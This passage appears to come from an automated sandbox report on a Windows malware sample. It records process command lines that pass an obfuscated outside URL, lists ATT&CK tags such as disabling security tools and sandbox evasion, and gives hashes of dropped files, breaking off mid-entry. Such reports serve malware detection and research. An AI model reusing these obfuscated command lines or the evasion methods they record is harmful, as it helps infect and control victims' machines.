C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7436

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:10140

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:8484

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:7632

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:816

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:8932

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:9104

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5088

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Bav1ljnj0\onq0xnah.exe

Filesize
58KB

MD5
e9a4818ac7164f4ff1b2abfd99b75f6c

SHA1
efa6a80e1b01da25d253d40aaab35ee0596324c6

SHA256
a2a61b330cdedc8cc6100bca4f8ada8ead9f626c68674014c7a1a7da79df399e

SHA512
4f12c891bae50ed09be0ab4688629089d0a9bac2fc0b41e69122b54651b1b932f2888b0a66cdfbd2d4e6b4067da3c9159b38b0fd2ab27c45a1e9dfb1707ded06

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\114.0.1823.86\Installer\setup.exe

Filesize
3.9MB

MD5
2954f8af241623a2c01e050c5f7419d7

SHA1
6db1c44c559b5754d27149babdcd7c9f3a1c7d49

SHA256
7fe2abcc4175f13af0d5af3a2d2a36845be2699971b53f191324c40f0871ec58

SHA512
b729c8dd3bb6c1cf48a879788ad33a81a6e43d14b40930d3db2fa81626c50eeccbae1ad9c6ecb348d93f86ae53b7f419d2a5c0af0eda5adeea1296e644ae1fd5

Download Submit
C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}\114.0.1823.86\MicrosoftEdge_X64_114.0.1823.86.exe

Filesize
141.7MB

MD5
f7641ee0ee185ef19641d281854080d2

SHA1
3eea235858f90cc185a22cd036a6c30180b909a4

SHA256
cf674b519d64bdd0b2663814c6a659262f8f71fa4b46972807ccc3897e329f04

SHA512
9dd917cf4b5162fa45f3440e56d6abf5e2142fe7d426512ce6e0b2faae9f9322a1f0b4bc3fd751238c5ba4081090d8b163608bb9dceb27b51b1cbfe8c3f8ae04

Download Submit
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

Filesize
201KB

MD5
4cb326ff5bdb251b9f92b35e4a4d7741

SHA1
26442b959c62db6604f6d0bffaab38ca39050b62

SHA256
38a44760c4b6fd553531d7f99f6f78110f488e57ee00d2fc498635ec7ab4a478

SHA512
9d62f48be43de8e6a60ee40f9e982c1906273b65c96299ae68e1f72e31b8f78dd01199b36f62e61836a2c0d84fc106ae550cf94ffe2cb9b6a082774cb8eedea4

Download Submit
C:\Program Files (x86)\havre\Lashing.dll

Filesize
306KB

MD5
ee340815a50ce547b1b83daa3862beaa

SHA1
be8463eb5e8552c402c40cd541931f09ab08f4f5

SHA256
5b51a2b0cdc5ac218e0d81d4ccc062f98c7628cf47ea281d33693fc7016e8c76

SHA512
5b9dde130dcb571babc21f2a065b277afb6a057b82ffe406f322622a48f26fcb45718ff187a0254a5f1a89477373acba88a80ba06de4152fff4c92a87ccd8b4a

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json

Filesize
593B

MD5
599cb41680e184e97b87eb5b3eae901d

SHA1
6a3162a043806dba37c447ecb18b70ed6972ab33

SHA256
23486efbb2afbe8c5ea97233dad051b59651ae66a5e71bf2c41b47fa9197600b

SHA512
2d8d178de33d41cec7af6ff0434b753c2d0b74b6a7713f26d812408c7cb66b71647ea0e060fd195312019aaff8c160cc393a24dd7cfa88f8a4724093ecfe77bf

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json

Filesize
655B

MD5
2a32e070cec00952e2d96dd7152b7212

SHA1
1d5cdd43bc419bbd253ffce5fb4a1baed2134aad

SHA256
5d7497cb4ab8e274ff9083aeda2f94721f6d33b72a178b46170ecc90553f7e4f

SHA512
e420c5f1cfe42c9c31e4b4e401ac74a762c3c49818d932da9ef1851af1a0c0e204dd19afc9b3b3d25b28dd5b843a39f6b0bc4d8bf4b634dc155df241e2de4918

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat

Filesize
8B

MD5
f23d1d997bb73f4a3f00198250641872

SHA1
0b0fee904bffec18aa40570f0b026512d8cd07fe

SHA256
dbfb774da2ba0a6c908fdfb227cb73b16d016271baa4b072ff501ea430537728

SHA512
167462827ffa1620b7e987703b491b3be44a9ac7277ac14477eb81c3e068ce76dc5963ef119e3ec617a12db2753f375e96cb6d44110b90a730c2e1d84991b255

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mb4uns.exe

Filesize
3.8MB

MD5
e8dd943b67fb14caf3f09d6762e25660

SHA1
0414f4cc1157559479b5f2c1d6f452eab14ca2c1

SHA256
683946520fefe89c98edf1fe3b8adf17ae48d0ba0a76782bec8537a6c9c6361e

SHA512
4fd53b35901612fe80d4ca223c99027bded437cd700a90f367234d21fe15690e6626c30525ed9beefb412729f9d8334d72e0a1625ab74596d463a19ca47c8645

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe

Filesize
23.2MB

MD5
afb49ea8c80452083426ee6c9ea2c165

SHA1
fae1c16efe38340d49dcdf4343175a4d1b60aaac

SHA256
32249b9c675c338f489495620acae41174e0d2840957e72d86ac32b10e989dd9

SHA512
3a66be4072b7260f95d9c7ddee72ceacb481b31a28eebcd60d802c131d0e4c8c183005a4d58cec485e4d73555b12af5cdbd425457d05ebd86a5f7ef856a67d44

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe

Filesize
8.6MB

MD5
f42716297e840503c96b75a166c080d9

SHA1
ddc97b3fe5b73eaf14b15d622ba88105b233636a

SHA256
c7fccc778d35ce861ed8700d4afe6d1a12ece6d3a272dd8072db2013d87919df

SHA512
bec11aaf34c426160d52da88f9dff564f67dd82ca1a0cb5b8f9240bb556abbcbdd8eb576aae56dcc63a074174f2af40be018079d5b57c843827cf0a64338e1de

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.sys

Filesize
233KB

MD5
1dc6d344ee9b6b024ba23278891db9a5

SHA1
519b792d11daa2bf9d127f69cdd603a236576e04

SHA256
823e1c7321e177b006c1f3fd1ec8b99607a12d2c3c321f3a6cbbcf7030b6c240

SHA512
fb96c4ede03c3aa729d2ea5a72c5f14029f6d69a79b6e0d5449e371bf3acdbbd1cb2079e8bbac3a3140a257c71018bc7a2a31a45ad5c8b65382e67cc3431ab6a

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.sys

Filesize
217KB

MD5
6a21162e1c8a9f65787b14bc439eb077

SHA1
1bf68b253edd6cae098144e24e09b4e22178784f

SHA256
8b7990e1c676f53918e41f6b18b20179d77e598352d9243b05e2ea22b2d9e4fe

SHA512
a0dafe66479b9e68ebf04a7e2fa7c7cc352fb075356b7eccebee7af527393711e3cb36c7ff6466a5e28b17d1d003c1c49ef176b448f5de36a7c8177c9c8808c4

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\srvversion.dat

Filesize
10B

MD5
f33742967e3940a2cf564dd4730d84ae

SHA1
fe914bdc2885bd3c09abd7811c0ffcec6574827d

SHA256
39262a64764a8a6e45a65810b8178905e31c50756db299258abaaedd6a28f157

SHA512
10205f3291c79b6e1901333cc4a9491168b3cd65a14ae7fd7abec2cb9bbbcdeb3617e240d45d16bb252cc11402e6938cd50f7f0e19ac08b67a5bec01b045ec9f

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\uipkgver.dat

Filesize
6B

MD5
74c6677020fc6b6c867aab117078bf5f

SHA1
8c46db37dc0b39eb963d4144539c8b591e122400

SHA256
cdbb9bc874d71e154c71b68b1fe959913d286036dac11e226e5620c919ba9708

SHA512
3f9db8d9bb25322f8d8e750750bf92dbe6ac63d686eced65cddfcd61178cf0e947118a491058414d4d2cbb4892e39815565669aee0dfdda23aece72d278292d0

Download Submit
C:\Program Files\Malwarebytes\Anti-Malware\version.dat

Filesize
47B

MD5
9fb85d7844bc2527b7e1dc6745d2a7d0

SHA1
6e3182c8d98a490fd0cdfcc5c0494260bd49ba1f

SHA256
2984378366a7bee9dade045e6272400147e1aef1cf9b88f589a7b89ec6e2123e

SHA512
d7d583f8e93a3301dafcb30c236ae3b9bfd1a85f47b66527cd0397bd3f2abfd73483218575b2db24821efca897a53dac67461867cf5801fbca4934e3ca32ebb2

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

Filesize
47KB

MD5
6268be3ccc5dedb93d76bea3317dae5a

SHA1
6db906dad34eca2165eca9fbfc67edb9f77e3843

SHA256
1e1fdac597571cf63f633dc1f0c3ce29888cf4d4d58684cf91eb9b1eb28f9cc7

SHA512
f3533c85be65cfecb0474ce82f7ee6738922274aa075e67da7605884393a04d20d45ddec9ac5b53dd0924a6e429827675b0b1c40c6ff8b6268cbd67e1b2a597f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

Filesize
64KB

MD5
e1db3f15a29e7645d347dba0c2348a60

SHA1
9ebce91ee0f70788ccf2146bbcbbf58bad9601e6

SHA256
9d83185c26448cf677b6734fe5ec5453a722b0b7e8640a01a540a726f9b0858a

SHA512
ccc071f9a46315196ea6e83e7c290f7a93dfc582057cdf181f3d356aaa382828532ac797f14bc8917771cd487b3bc58300e4f2e3259b67713f4cb678e3b2b49f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\ArwControllerConfig.json

Filesize
607B

MD5
881703ecdee33f80226bf5d1bde03404

SHA1
7440f2dd50ccc256f7da6f719395f8e84894dd53

SHA256
861569e7c86ca690d84ea368c163dd598d39722c99d2a07bed908c4abdeac49d

SHA512
44af265f9d713232b4978fda2f0b9f05a9f7e43c6fb217c41da7870c15a83786a858e3802ec00ff8b4d5b645b04746f5867c0504b55d712da4d589c89fbae66b

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json

Filesize
846B

MD5
0919a815eed971a8190fc28ccfff01fa

SHA1
01998b5386371db34f8e75a97813698e44f3f686

SHA256
d4f59fb7f7247bd90386e8db442393819c16c4b1fb9cecbc16062fb98ef67e19

SHA512
00f72e1923a4176b366818330e269dbe3e59c642e944d480dd8844b03b4d2f9f8363a1d17662f4a0935f8ead849aaf3b4103a9bfc1965b7943586aa4f949666c

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json

Filesize
847B

MD5
0efa856d1509b302808220e7158425d9

SHA1
4be220a73bae3d6ef09111d1a366813a786d83b4

SHA256
cd7fa6af153ade2afaf37c4cb0e1e2b857df2d8a1b616bdd6375840862a2b2f5

SHA512
df0eede4ec4bdbc9aa267c7f32fc65ff0f34fad0745a8a04241ee9b5a7c584909ed7a71b9163179576712bf4386e49214ea10ca190b3b8432ae1e02a4f4a9f9e

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

Filesize
1KB

MD5
5ff145959e44ce6ff796fa3e2d780056

SHA1
a5115fb11b1d3a7cf37c0e3d506689230021b8a1

SHA256
d9e623e11e57ecf9f8a8e7c06a49368c6ffae72863d61b88fcdf39bd75dccbc3

SHA512
9de03de0d46d339850bcfa135002f1ffa9493b9f0adc1d9e6a98f3c770ed27359914e61733c5fd222bb27d7416d2016c274f157a81aa73546bc254e0aabf46f9

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

Filesize
791B

MD5
fdebdb47887576e059f42e857f7fdd23

SHA1
efb21692068b00f40ac03d3df41e1090fa2c85f4

SHA256
01f7b51a3768e5252d2ae37ad1f4c6e3a402ce298de45c371f50d8cac48d80f1

SHA512
ca63f976fa9ef0afcf4e1387ca2f093c63d17d7af726181a5d493f2ded57b415ce6f6261fc38d1ea547261f329a46fb79b948c4729bcd64fa0e4da5d64d61074

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json

Filesize
9KB

MD5
a9a17f653cc2209174a59e587300124a

SHA1
feaeccc6a30ad6d70995e178da4d754fca715a9b

SHA256
b4fccf7ad172809e821de13a88eef85a17eed36ec100bfc13aa3a9823ad9583b

SHA512
58c440691b26453c443c246f8bf5efabd98209a3d000bdecaade9b0091ed8c527cd71e320319725568d767ced4e1073dab564d79ab267b9517f00aaf1f846497

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json

Filesize
10KB

MD5
4b9714fb297d21ebb4f3a45b595daaae

SHA1
ece5a4f2ace0d514661061d89dcf1468d636d5b4

SHA256
f9f24830f51cb2eb46b7c844397f38d6f8b80d8369272e39e2aeb664e6a092e5

SHA512
4946f9900eb4e70899657f0dff63ff7371b01a6dd93e1b64b2303d7c57b1ca45ff7facb428f0e51bae28ed405a85a0eae3b67e7195185fbbe8948d7b03e4379d

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\MbamClientConfig.json

Filesize
1KB

MD5
7986b3b400363bd2ee0336834babebc6

SHA1
ba804afcb86f16d740962d0acaac7df5257c156f

SHA256
fef4ddae3d679ae91ad546f239cf21f9454fbe86ff1344b864170ae8ffdda533

SHA512
bf97f92eecd634baf787a810606c43a912f6c0813545ab21d0b99c2576852c35c54b8c608077af671b7c4a3446ca02d9e016162bd2158c41f23d2e1eed5b870b

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\MbamClientConfig.json

Filesize
11KB

MD5
1554254e6aa1c25c5b37814d28d8dc76

SHA1
568506e1bd31e0b233d6ec034d311b1ab746ab94

SHA256
374d74ef3d27c01577efacbb69c6528c03aa613feb21eed4fc9295e9c3e810d1

SHA512
436b985d512fbc6343c43609360b8c8919eb9f87c09ec1b4a474be764c23dfcfc766e8b4521b106dfb39ab0e0d14ba7855d8c2102f2559ff0c2f521f1f9ba404

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\MbamClientConfig.json

Filesize
11KB

MD5
e36a444104bf8bd0a13ec31166fc7f3c

SHA1
a42e13cc4f2762cb1049a4593541605dbb1632b5

SHA256
24b124f7e40c4d8533a786451ac1293f870795cf4c2b6e1f957fea7b86ad572d

SHA512
b5eb212962e996ab36b8c24c762d8c41ed1b84123ea62843c0785966d4895b075015f01f9e4d606a6e1f1b918daefd5ef8f8656b65fe063d29656c792d0b8944

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json

Filesize
2KB

MD5
84a58d3159506e36c19c395d4475a823

SHA1
7ab523e5c4aaf8010da8513bc8da40f1e547ced2

SHA256
3ca3ca46a1906214ec7efe8d33987410e37ecda867791f51115ef2a0f765e211

SHA512
b32b68fd5d44a639e610c74b600aa8ac4d64ad65f4a5fb398f5e674e9e161a6afbfa0ab99e3e4e629ced09b34498d619092257b89ff16f1db9b60a7bebb36ca0

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json

Filesize
2KB

MD5
84a58d3159506e36c19c395d4475a823

SHA1
7ab523e5c4aaf8010da8513bc8da40f1e547ced2

SHA256
3ca3ca46a1906214ec7efe8d33987410e37ecda867791f51115ef2a0f765e211

SHA512
b32b68fd5d44a639e610c74b600aa8ac4d64ad65f4a5fb398f5e674e9e161a6afbfa0ab99e3e4e629ced09b34498d619092257b89ff16f1db9b60a7bebb36ca0

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json

Filesize
814B

MD5
283d2c9f54c0e0ee382f9746c986c7b9

SHA1
be17e61b0ecb4d2c17cd51cb397fbb308e155f72

SHA256
b7c5768f36320b70a83c51f30c65943a9f16bea30d7dcca79259daa6182ae47c

SHA512
7f91a8ab077938f576021d45811dc5834f358cfa4bc918b8bef5695716feedd10889cad2ba6faec51b6890e2be3d57c265b6c448b0e4a88628a9491bd7255a74

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json

Filesize
1KB

MD5
5ce78ffc19da2c5174498f6c024bc938

SHA1
aed705524b1496fe42307b6669c504e81c826ea4

SHA256
39cf7aa126b744a7a355693cf64a482fb5595d18df08832c2df5a6233d189ed9

SHA512
c760e4f88b4d1978932f399783e752aeac47873553cd83469811c478d60472cd05ace39407486d0206c221068aef140e98b3c60eafde5defc3264e30ec02522f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

Filesize
2KB

MD5
9ac1bd35c87fe1f422f37203e6ce00c1

SHA1
d17bf85866ab2d43cc7eb0f77ba76461e6028afa

SHA256
2b580556b6f139f8b2688a28b97b7b33b85dbe9d0d118bea388305907ead5937

SHA512
4c58cffcc3efc563d28b42b9b18a1839fa73b120bbaf8ec7d463e27f9981f47aa97aa86824eebe854d2e1367142905b980005e968a64e14d6468cbe7a3be61f1

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

Filesize
4KB

MD5
b30c33f5ad18a3a8043ef0a6efe41a0d

SHA1
0df6e0d783766cc872bafed43af901164d4e5d3b

SHA256
fe0779bdbd89d781274f5a99bdc7f153b1221e389f7fbd85f40522808bf4f4e5

SHA512
304e4abb1554bcf65f5a74bca3a2da80969f371d463be13c01821b22c4680893ea46acb9c2ca1f4681131a8c7578bbb292e4fc95a1562bd575d624754840a026

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\SpConfigFile.json

Filesize
10KB

MD5
80db55c8e8becf46b89495391e7a73df

SHA1
89986542bafe847c925dc0c43a73f505a2a8046d

SHA256
ddde601c2f7f5ba4096b2616328086e6f14ca7de7ba762bf13d6caa302171dbd

SHA512
b813e691230e4d2852b9e0b0cf5ebbd87dc6055d88bb89c0abebca564d94f4132ed81be21b7f8158d5a01989bff0b24db10aff59c35f722d0632ba99a5fada85

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

Filesize
1KB

MD5
78dd191b7562f6dc5b3b38d9d8c76b5b

SHA1
b1939a68a1077900d4784849544477385ac3a28a

SHA256
e5e1870587c72f4c47ab713ff4f595ca928fd438f0d7f2a4a692185040e6aa92

SHA512
45743c6a83a02a7efda52234687ef7584db0246da07f981f4fbf9f5db565397bcec7f87f8a35fc832d3cb7967e0bf4b18113985f25a4029e41b69ad3fbf85692

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

Filesize
1KB

MD5
17b45c7ab9f857113b780a3eff123a1e

SHA1
1209bff03347ea4dbd24e5adb59dc4dcf631597a

SHA256
941cfc601b066ee84f88a7681fcc7234b185cf3fbae1eb119bca844235946e56

SHA512
fc22f8b3a016c0b9672a361d4d748627be05c14dd943fc703697b43c27c4f07168c528d8086e11da43202fbf8f2a58277840bf58b6b1ba3985184b20b57b2f21

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

Filesize
1KB

MD5
7c30bb0a45479e033d382b8cc9089670

SHA1
3f5b57789cb97c7c90f030dbe5b68d09977d0d28

SHA256
66cfa4e4965b3efd3feb6c5d4a2475f7e06277f83ff62c001d2a033f05396b41

SHA512
35c15caee82721510dc49c39eac9324c58340b207e794e558a4a95fe3fbc9a126ce621becc6f3909ce7e0e898496f3df116587660989206aa25d7e0487c4d3d4

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

Filesize
1KB

MD5
e731d9ae880aca367da1225d14f1de87

SHA1
ffdf1650d3a520dade849886cca84cf8b5a13339

SHA256
063eff5ec167632522a3b49dccbe58cbe1e66f87d0663de96cc189144999cb42

SHA512
d76d2baae50dcc880326bd9ff18bf7d36020c48b1ca071544b4b2ead9ffeb9cb3edb27c47c69c25729d452a74cccafbddf8688eb0a793e4d543cd0c44a584288

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

Filesize
1KB

MD5
57801ee46b6d2a5d4bb88b87a93aa1b1

SHA1
e0d26a2d6a28aae7a3e7b0239f92edcf0af82236

SHA256
e971094866797cb5c12610aed7e77e91a7c9adc663a42b31473305014cce8c8d

SHA512
a5bcebc60530e698cb424344a253aaeab7dbf4f6e2d1c3613ac2d1f56828ec1eb6ddd8527f74f090d8e83f1e20670e569e9479365df02f83009e82e6380df881

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Actions.dll

Filesize
5.0MB

MD5
1eff53d95ecaf6bbfffe80d866d8e1dd

SHA1
d7ef7d7c77fd04b2c0eb8c16bb3cd08057f6742f

SHA256
6dd748f7ca56125cbe158fa3612f08e7312ef58ad5375e6b7ab5532cc16ca0ac

SHA512
c59b8e6f0b238a247e64b9c7bb42213dadac1dada63542830a6292361174c935c0c662b2d1aed3fb6100cc4993297b1eaf25e328f2b4613458c4ffca63b9f02d

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\BrowserSDKDLL.dll

Filesize
5.8MB

MD5
1ed53171d00f440f29a12f9beb84dac4

SHA1
4d9a1e3579b0999f1ab2fa818b588411e9ee920c

SHA256
e659e687a872050f9e65d78992d16bd9b393cf3f8e8c94e0e15fb42b7065327e

SHA512
17161cfc672d1b996b8af4ebac17f9a8a3807f38c9a23e2e5b4dadcd9a21c3a64faec9bf59147022a9df88b80f89300f1b537091289bd7a42806bd206a317e6e

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.nm

Filesize
336KB

MD5
ca75a09c515102a2cd82186c06f25eb0

SHA1
661bad1462f8d9d196fcd0e9897c6318f5e2dc91

SHA256
bb580f11a3af0f985a452b4649693901c5b395304cdd7151190621a8b08014c0

SHA512
45418718af44faa5abd14098bb6225f340d8f39b446a2b919f42109690430ec50e3eab286251d531cbc7a11d0d4e4d59bff46b6b77d2b2f821ee4607607538e1

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.sr

Filesize
16.7MB

MD5
96a46d89e926ebb629ec7c3c549269b4

SHA1
3a57ae39c924596177c2d9e663e76f5aa66dce86

SHA256
ac9f2219b7620734c0c138f8439c376440e0cd84d8fdd5b33bdffa70ac5c678d

SHA512
9dcf2ad8d347a864f40efceac1b4f560833aebc96e2757d20577c58c6c5a7ddcce4a2f0b6aee851b3dc2e2c5161d4ffd39ebd39f990733229dbda96522076227

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\MBAMCore.dll

Filesize
6.4MB

MD5
b2216df400c3ef59f9406831ba7956b5

SHA1
1e26588190fc8a608e773239d498ceb79a92fca3

SHA256
1e429ee1da8a0fe6569673b7052c5f49c193aaa8f3152451f645539a431b792d

SHA512
3aa3c9ed3bcaa0f2b7c4de36f7a83e35e8abf63c972c8e5377915bed41a803ae516cf8ef14e9c455043dd1ae46e4aec1820fa3572e65d0c87a99eac1d43d1f40

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\cfg.bin

Filesize
661B

MD5
8fd13803b1e5f14b4d241facc601a170

SHA1
7321eec794bc766d84d75bd0370a9f2e4d7abdf6

SHA256
925d771b2643715b62ef720801dfa96047fff1ee70eabb244bed802234673717

SHA512
f5b3514258487f8576fe32a795eefcffef049c7d002a6abdca17383bba838c7a218be23ec6803dcefed615f40afc2ba4b15bf65c9a74c4f6bb891d15d02bfc22

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\clean.mbdb

Filesize
10KB

MD5
6f9b49be0223ac79a713fb1472f890bd

SHA1
6d89aea5a4823556b005a381b9334acb68a01210

SHA256
33a14b9ff0c92254945b0495a822611a0170daf4c0ce0dc4203a181c678dbb78

SHA512
7b8df6420fd719fccbe1c4a7874514362ca06e20cd12dc3f788ebaaa3150e301d0e975b50bb52d1bf99f7f835b1ebf45fadc53fe7be9fdf74777ff90c1ffd95f

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dbmanifest2.dat

Filesize
924B

MD5
34c49cec4888b3192a5800e86569cecb

SHA1
b98b9b802d51c13c1acec443442b7cd94b782795

SHA256
d7c260b0751c7ac8f0e87852a4148f9231781a9578713b32d9eaa14632151e01

SHA512
bebc6280e122c761f43367234d9472070c7ff5fe34e43e64de9884cd202799c90072f7cbad29330367506514c84ba78e69afc7b46aae6a127fed283e2ef02e72

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dynconfig.dat

Filesize
39KB

MD5
10f23e7c8c791b91c86cd966d67b7bc7

SHA1
3f596093b2bc33f7a2554818f8e41adbbd101961

SHA256
008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc

SHA512
2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\exclusions.txt

Filesize
23KB

MD5
aef4eca7ee01bb1a146751c4d0510d2d

SHA1
5cf2273da41147126e5e1eabd3182f19304eea25

SHA256
9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f

SHA512
d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\ig.exe

Filesize
1.8MB

MD5
14cd82fe89752e3723a9b42aaa68763a

SHA1
ea407d8d7064581406eb1b14e0f01cee61afb252

SHA256
60e6029bdf3a2d88772bd4ec3aea6b688505e7dfcb76ce371d6942e9de95ce04

SHA512
16114ff38a2e2cc59a9bbf420304fda8e558022f385748a5f48c02f037cbe815221a1cb4f0ac1deeb408ebf66ee3e25c059b157c7cc5cb169dbac75a73694fdc

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\mbdigsig2.dat

Filesize
514B

MD5
1bf439348c549a315a93063435aedd61

SHA1
24a328bfa036a1b6c4a0061cee897ca2412aa910

SHA256
2fad5a3126bfd30b43c984de4a2c6c14b04ee87e10b8b7b9cefee6b57d6a9ea4

SHA512
df7cb9eac93a990588575d0db2779449c48902583659ab9e5647dfa2f533acce737afa926bcccefa8a67fe09f01b287664f0f0076438fb87878950c9125000e0

Download Submit
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\prot.mbdb

Filesize
24B

MD5
546d9e30eadad8b22f5b3ffa875144bf

SHA1
3b323ffef009bfe0662c2bd30bb06af6dfc68e4d

SHA256
6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f

SHA512
